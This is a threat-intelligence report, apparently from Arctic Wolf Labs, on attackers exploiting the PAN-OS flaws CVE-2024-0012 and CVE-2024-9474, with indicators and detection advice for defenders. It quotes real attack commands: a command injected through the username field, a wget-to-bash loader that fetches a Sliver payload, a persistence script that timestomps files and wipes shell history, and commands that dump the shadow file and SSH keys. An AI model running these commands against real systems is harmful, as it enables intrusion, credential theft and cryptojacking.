Key Takeaways
- Arctic Wolf has observed multiple intrusions across a variety of industries involving Palo Alto Network firewall devices.
- Affected devices triggered downloads over HTTP including the Sliver C2 framework, coinminer binaries, and various other payloads.
- Evidence suggests that threat actors exploited the recently disclosed PAN-OS vulnerabilities CVE-2024-0012 and CVE-2024-9474 to gain initial access.
- Monitoring firewall logs for usernames with unusual characters provides an opportunity for early kill chain detection.
Summary
On November 18, 2024, Palo Alto Networks disclosed the existence of two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in Palo Alto Networks OS (PAN-OS), the operating system used on their firewall devices. A day later, watchTowr released a report providing technical details on how to chain the two vulnerabilities together to achieve remote code execution of these vulnerabilities. While they did not publish a proof-of-concept exploit, the details provided were sufficient to understand the exploitation process.
Several hours after the watchTowr report was published, Arctic Wolf Labs began to observe multiple intrusions affecting Palo Alto Networks devices. Based on the close timing of the watchTowr disclosure and additional evidence reviewed by Arctic Wolf Labs, we assess with moderate confidence that these intrusions likely involved the exploitation of CVE-2024-0012 chained together with CVE-2024-9474 for initial access.
We are sharing details of these intrusions to help organizations defend against these threats. Please note that we may add further detail to this article as we uncover additional information in our ongoing investigation.
What We Know About the Intrusions
Exploitation Details
Historically, threat actors have shown an interest in rapidly weaponizing newly disclosed vulnerabilities, especially for perimeter devices such as firewalls and VPN gateways. When the CVE-2024-3400 RCE vulnerability in PAN-OS was disclosed in April 2024 with a subsequent watchTowr technical writeup, threat actors were quick to begin mass exploitation using the available technical details.
With the disclosure of CVE-2024-0012/CVE-2024-9474, we observe a similar pattern of threat activity targeting PAN devices immediately following the publication of relevant technical details. As described in the most recent watchTowr article, a username field can be abused for the injection of arbitrary commands. This aligns with firewall log lines that we observed showing a Panorama console login where the username field includes a bash command enclosed in backticks:
1,2024/11/20 REDACTED_TIME,REDACTED_ID,SYSTEM,general,2562,2024/11/20 08:08:18,,general,,0,0,general,informational,"User `curl 46.8.226.75/1.txt -o /var/appweb/htdocs/unauth/1.php` logged in via Panorama from Console using http over an SSL connection",REDACTED_ID,0x8000000000000000,0,0,0,0,,gw11_2,0,0,REDACTED_TIME
Notably, some files observed during this stage of the attack referenced watchTowr and CVE-2024-9474.
- watchTowr.js
- watchTowr.php
- watchTowr.txt
- CVE20249474.php
Command and Control
Arctic Wolf Labs observed several similar indicators of compromise in the most recent intrusions to what was seen with CVE-2024-3400. For example, as seen in the example command below, a common pattern is for threat actors to use curl or wget on compromised devices to download malicious payloads with IPv4 addresses in the URLs instead of domain names.
Several commands were observed in the most recent intrusions that indicated potential ingress tool transfer. One notable example is an instance where Sliver C2 was retrieved, an open-source alternative to the commonly used Cobalt Strike penetration testing tool.
wget --no-check-certificate -qO-https://104.131.69.106/vicidial/vicidial_sign.js|bash
The contents of the script (vicidial_sign.js) shown below has several key functions:
- Curl is used to download a JavaScript file (up.js) from the 104.131.69[.]106 IP address and saves it to the /usr/lib/e_nas directory. If curl fails, it attempts to use wget instead.
- The touch command is used to change the modification and access timestamp of the /usr/lib/e_nas directory to match that of /usr/lib/php.ini, likely to hide the recent modification to the file.
- Any existing content in the /etc/cron.hourly/telemetry.cron file is cleared out, and a script is written to the same path.
- The script then checks if a process named cloud-lib is running (psgrep -x cloud_lib), and if not, it copies, /usr/lib/e_nas to the /usr/bin/cloud-lib directory, setting its permission to executable only by owner (chmod 700), then proceeds to run it in the background.
- The permission of /etc/cron.hourly/telemetry.cron is changed to 755, allowing it to be executed.
- The touch command is used again to modify the timestamps of /etc/cron.hourly/telemetry.cron to match /etc/cron.hourly/logrotate_hourly, again likely to hide the modification to the file.
- Bash history is cleared to avoid evidence of the commands having been executed.
#!/bin/bash curl -k https://104.131.69.106/vicidial/up.js -o /usr/lib/e_nas || wget --no-check-certificate https://104.131.69.106/vicidial/up.js -O /usr/lib/e_nas touch -r /usr/lib/php.ini /usr/lib/e_nas echo '' > /etc/cron.hourly/telemetry.cron echo '#!/bin/sh' > /etc/cron.hourly/telemetry.cron echo "bash -c 'if ! pgrep -x cloud-lib; then cp /usr/lib/e_nas /usr/bin/cloud-lib && chmod 700 /usr/bin/cloud-lib && (/bin/cloud-lib &); fi'" >> /etc/cron.hourly/telemetry.cron chmod 755 /etc/cron.hourly/telemetry.cron touch -r /etc/cron.hourly/logrotate_hourly /etc/cron.hourly/telemetry.cron echo "" > /root/.bash_history
The file (up.js) outlined in the section above is a UPX-packed Sliver payload.
Data Exfiltration
In observed intrusions, threat actors issued multiple data staging and exfiltration commands to retrieve sensitive information from firewall devices. Most exfiltration data included firewall configuration files which are known to include hashed credentials. Additionally, some attempts were made to exfiltrate operating system passwd and shadow files.
Here is a selection of injected commands involving attempts to exfiltrate credentials and PAN configuration files:
cat /root/.ssh/authorized_keys > /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php’ cat /etc/networks > /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php’ arp -a > /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php’ cat /etc/passwd > /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php’ cat /etc/shadow > /var/appweb/htdocs/unauth/watchTowr.txt’
In some instances, threat actors archived the output of these files using the tar command:
tar -zcvf /tmp/f03.png /opt/pancfg/mgmt/saved-configs
PHP Webshell
One of the payloads deployed was an obfuscated PHP webshell. The key functions are as follows:
- When a HTTP request is made, the webshell monitors for the use of an obfuscated POST parameter called $oNvPH071PRH, which is a base64 encoded and XOR encrypted string.
- Upon decryption of that POST parameter, the webshell looks for a provided payload parameter, which it proceeds to execute through the PHP eval function.
- The output is base64 encoded and XOR encrypted, and is padded with a header of the first 8 bytes consisting of the md5sum of 18f566d952acaa29, and with a footer of the last 8 bytes consisting of the md5sum of 18f566d952acaa29.
Coinminer Activity
Some cases involved the deployment of XMRig on compromised firewall devices.
Shortly after the retrieval and execution of the file, network traffic reaching out to known XMRig IP addresses was observed.
{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49VQVgmN9vYccj2tEgD7qgJPbLiGQcQ4uJxTRkTJUCZXRruR7HFD7keebLdYj6Bf5xZKhFKFANFxZhj3BCmRT9pe4NG325b+50000","pass":"REDACTED","agent":"XMRig/6.18.0 (Linux x86_64) libuv/1.44.1 gcc/9.3.0","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
How Arctic Wolf Protects its Customers
Arctic Wolf is committed to ending cyber risk with its customers, and when active ransomware campaigns are identified we move quickly to protect our customers.
Arctic Wolf Labs has leveraged threat intelligence around the exploitation of Palo Alto Networks devices to implement new detections in the Arctic Wolf Platform to protect Managed Detection and Response (MDR) customers. As we discover any new information, we will enhance our detections to account for additional indicators of compromise and techniques leveraged by this threat actor.
Remediation
For more details on recommended actions to address these vulnerabilies, see our security bulletin here.
Conclusion
Threat actors don’t wait around once new vulnerabilities are disclosed, especially for perimeter devices such as firewalls and VPN gateways. Across different campaigns and vulnerabilities, similar patterns emerge that help defenders react early in the kill chain.
The activities we’ve highlighted here are only scratching the surface. In this campaign, we’ve observed exfiltration of device configurations and credentials, along with the deployment of various payloads including coinminers, botnet malware, PHP webshells, and C2 frameworks. These observations illustrate the many ways that opportunistic threat actors attempt to leverage these vulnerabilities, for financial gain and otherwise.
Defenders should implement robust external monitoring and alerting for perimeter devices. In particular, close attention should be paid to unusual HTTP activity on such devices as it emerges. Additionally, as recommended by Palo Alto Networks, management interfaces of firewalls should not be exposed on the public internet, and should be restricted to only trusted internal IP addresses.
Acknowledgements
Arctic Wolf Labs acknowledges the work of Ishmael Guarin, Gagan Sahota, Jordan Bourcier, Phillip Kaiser, and Abdo Elhemaily on the Arctic Wolf Security Services team for identifying the mass exploitation campaign described in this article and identifying command injection in PAN firewall logs.
Appendix
Tactics, Techniques, and Procedures (TTPs)
Tactic | Technique | Sub-techniques or Tools |
---|---|---|
Initial Access | T1190: Exploit Public-Facing Application | • Exploited CVE-2024-0012 to gain administrator access to the management web interface of devices running PAN-OS software |
Privilege escalation | T1068: Exploitation for Privilege Escalation | • Exploited CVE-2024-9474 to elevate privileges to root on devices running PAN-OS software |
Defense Evasion | T1027: Obfuscated Files or Information | • Obfuscated multiple scripts and malicious payloads |
T1070.003: Indicator removal: clear command history | • Cleared bash history | |
T1070.006: Indicator removal: Timestomp | • Uses the touch command to modify file timestamps | |
Credential Access | T1003.008: OS Credential dumping: /etc/passwd and /etc/shadow | • Utilized the cat command to output file contents of passwd and shadow |
Collection | T1560: Archive Collected Data | • Utilized the tar command to archive staged data |
T1119: Automated Collection | • Automatically collected firewall configuration information | |
T1074.001: Local Data Staging | • Output sensitive information to random files in a specific directory before bundling them together for exfiltration | |
Command-and-Control | T1105: Ingress Tool Transfer | • Utilizes wget and curl to retrieve files from C2 addresses |
Impact | T1496.001: Computer Hijacking | • Deployed XMRig coinminer to mine cryptocurrency using the device resources |
Tools
Name | Description |
---|---|
XMRig | A tool used to leverage host resources to mine cryptocurrencies such as XMR. |
Sliver C2 | Penetration testing framework. An open-source alternative to another known penetration testing framework, Cobalt Strike. |
Vulnerabilities Exploited
Vulnerability | Use |
---|---|
CVE-2024-0012 (CVSS:9.8) | Authentication bypass vulnerability in Palo Alto Networks PAN-OS software allows an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges |
CVE-2024-9474 (CVSS:7.2) | Privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges. |
Indicators of Compromise (IoCs)
Indicator | Type | Description |
---|---|---|
104.131.69[.]106 | IPv4 Address | Sliver C2 / Payload Server |
104.21.52[.]167 | IPv4 | Sliver C2< |
156.244.14[.]127 | IPv4 Address | Payload Server |
180.210.220[.]139 | IPv4 Address | Payload Server |
143.198.1[.]178 | IPv4 Address | Payload Server (Malicious PHP Code) |
38.180.147[.]18 | IPv4 Address | Payload Server |
31.41.221[.]158 | IPv4 Address | Payload Server |
185.196.9[.]154 | IPv4 Address | Payload (Malicious PHP Code) |
95.164.5[.]41 | IPv4 Address | Payload Server |
93.113.25[.]46 | IPv4 Address | Sliver C2 / Payload Server |
107.191.48[.]109 | IPv4 Address | Sliver C2 / Payload Server |
38.60.214[.]5 | IPv4 Address | Payload Server |
46.8.226[.]75 | IPv4 Address | Payload Server (Malicious PHP Code) |
38.60.214[.]5/2.txt | IPv4 Address | Payload Server |
46.8.226[.]75/1.txt | URL | Payload Server |
93.113.25[.]46:8088/pay.txt | URL | Payload Server |
img.dxyjg[.]com | Domain | Payload Server |
sys.traceroute[.]vip/actions/register.html?q=88238714&yh=1743w7344 | URL | Sliver C2 |
77.221.158[.]154 | IPv4 Address | Sliver C2 |
A3092BFA4199DEF7FC525465895EE3784C6FCF55F0A7E9C8436C027E0F41CB4B | SHA256 Hash | Sliver Payload |
Detection Opportunities
As part of our Managed Detection and Response service, Arctic Wolf has detections in place for techniques described in this blog article, in addition to other techniques employed by threat actors described here.
Firewall
Command injection used in exploitation of CVE-2024-9474 can be detected through bash commands in the username field of log lines involving Panorama console logins. In general, if a username contains unusual characters, it should be treated as suspicious.
1,2024/11/20 REDACTED_TIME,REDACTED_ID,SYSTEM,general,2562,2024/11/20 08:08:18,,general,,0,0,general,informational,"User `curl 46.8.226.75/1.txt -o /var/appweb/htdocs/unauth/1.php` logged in via Panorama from Console using http over an SSL connection",REDACTED_ID,0x8000000000000000,0,0,0,0,,gw11_2,0,0,REDACTED_TIME
Network
On firewall devices, files downloaded over HTTP from URLs with IPv4 addresses should be considered suspicious when not originating from the vendor or another expected source such as a block list provider.
Additional Resources
Get actionable insights and access to the security operations expertise of one of the largest security operations centers (SOCs) in the world in Arctic Wolf’s 2024 Security Operations Report.
Learn what’s new, what’s changed, and what’s ahead for the cybersecurity landscape, with insights from 1,000 global IT and security leaders in the Arctic Wolf State of Cybersecurity: 2024 Trends Report.
About Arctic Wolf Labs
Arctic Wolf is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence, including machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings. With their deep domain knowledge, Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.
Authors
Julian Tuin
Julian is a Senior Threat Intelligence Researcher at Arctic Wolf Labs with more than 6 years of industry experience. He has experience in identifying and tracking campaigns for new and emerging threats.
Stefan Hostetler
Stefan is a Lead Threat Intelligence Researcher at Arctic Wolf. With over a decade of industry experience under his belt, he focuses on extracting actionable insight from novel threats to help organizations protect themselves effectively.
Jon Grimm
Jon is a Threat Intelligence Analyst at Arctic Wolf dedicated to identifying new cyber threats and producing actionable intelligence that enhances organizational defenses. He has background of 10 years’ experience in several domains of cybersecurity, holds a bachelor’s degree in law enforcement, and holds several industry certifications (CISSP, GCFA, GCTI).
Aaron Diaz
Aaron is a Lead Security Researcher at Arctic Wolf Labs focusing on malware analysis and detection research. He has more than 8 years of experience in the industry with a background in threat hunting, malware analysis/development and vulnerability research. Aaron has passion for novel threat research and adversary tradecraft.
Trevor Daher
Trevor Daher is a Technical Lead within Arctic Wolf’s Security Services group supporting the Managed Detection and Response (MDR) service.